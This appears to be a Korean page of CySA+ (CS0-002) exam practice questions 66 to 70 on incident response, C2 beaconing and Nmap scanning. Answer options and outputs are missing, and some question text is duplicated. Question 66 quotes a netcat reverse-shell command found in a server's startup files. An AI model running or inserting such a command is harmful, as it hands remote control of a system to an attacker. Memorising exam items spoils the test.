CS0-002 문제 66
보안 분석가가 회사의 공개 포털에 대한 프로덕션 서버의 손상 가능성을 조사하고 있습니다. 분석가는 서버에 대해 취약점 스캔을 실행하고 다음 출력을 수신합니다.

포털의 일부 시작 명령 파일에 다음 명령이 나타납니다.
nc -o /bin/sh 72.14.1.36 4444
추가 조사에서 분석가는 Netstat를 실행하고 다음 출력을 얻습니다.

다음 중 분석가가 NEXT를 취하는 가장 좋은 단계는 무엇입니까?

포털의 일부 시작 명령 파일에 다음 명령이 나타납니다.
nc -o /bin/sh 72.14.1.36 4444
추가 조사에서 분석가는 Netstat를 실행하고 다음 출력을 얻습니다.

다음 중 분석가가 NEXT를 취하는 가장 좋은 단계는 무엇입니까?
CS0-002 문제 67
사이버 보안 분석가는 DDoS 공격의 결과로 여러 시스템이 느려진다는 보고를 받았습니다.
다음 중 사이버 보안 분석가가 수행할 최선의 조치는 무엇입니까?
다음 중 사이버 보안 분석가가 수행할 최선의 조치는 무엇입니까?
CS0-002 문제 68
다음 중 고객 PII의 보안 위반 후 사고 대응 절차에 포함될 가능성이 가장 큰 것은 무엇입니까?
CS0-002 문제 69
핫스팟 질문
보안 분석가는 워크스테이션이 명령 및 제어 서버에 신호를 보내는 중일 수 있다고 의심합니다.
회사의 웹 프록시 서버와 방화벽의 로그를 검사하여 조직에 미치는 영향을 최소화하면서 위협을 무력화하기 위해 취해야 할 최선의 조치를 결정해야 합니다.
지침:
시뮬레이션의 초기 상태로 되돌리려면 언제든지 재설정 버튼을 선택하십시오.
시뮬레이션이 완료되면 완료 버튼을 선택하여 제출하십시오. 시뮬레이션이 제출되면 다음 버튼을 선택하여 계속하십시오.

보안 분석가는 워크스테이션이 명령 및 제어 서버에 신호를 보내는 중일 수 있다고 의심합니다.
회사의 웹 프록시 서버와 방화벽의 로그를 검사하여 조직에 미치는 영향을 최소화하면서 위협을 무력화하기 위해 취해야 할 최선의 조치를 결정해야 합니다.
지침:
시뮬레이션의 초기 상태로 되돌리려면 언제든지 재설정 버튼을 선택하십시오.
시뮬레이션이 완료되면 완료 버튼을 선택하여 제출하십시오. 시뮬레이션이 제출되면 다음 버튼을 선택하여 계속하십시오.

CS0-002 문제 70
회사에서 네트워크에 대한 보안 평가를 요청합니다. 권한이 부여되지만 세부 정보가 제공되지 않습니다. 회사에 웹사이트가 있고 회사의 IP 주소가 70.182.11.4인 것으로 밝혀졌습니다. 다음 Nmap 명령 중 일반적인 열린 포트와 해당 버전을 나타내는 것은 무엇입니까?

